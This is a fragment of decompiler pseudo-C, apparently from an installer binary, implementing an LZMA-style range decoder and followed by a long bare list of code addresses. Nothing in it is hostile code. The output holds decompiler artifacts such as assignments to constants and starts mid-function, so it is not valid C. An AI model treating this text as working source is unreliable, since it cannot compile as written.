												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00406ca8
0x00406cb2
0x00000000
0x00406c9d
0x00406c9d
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00406f46
0x00406f46
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
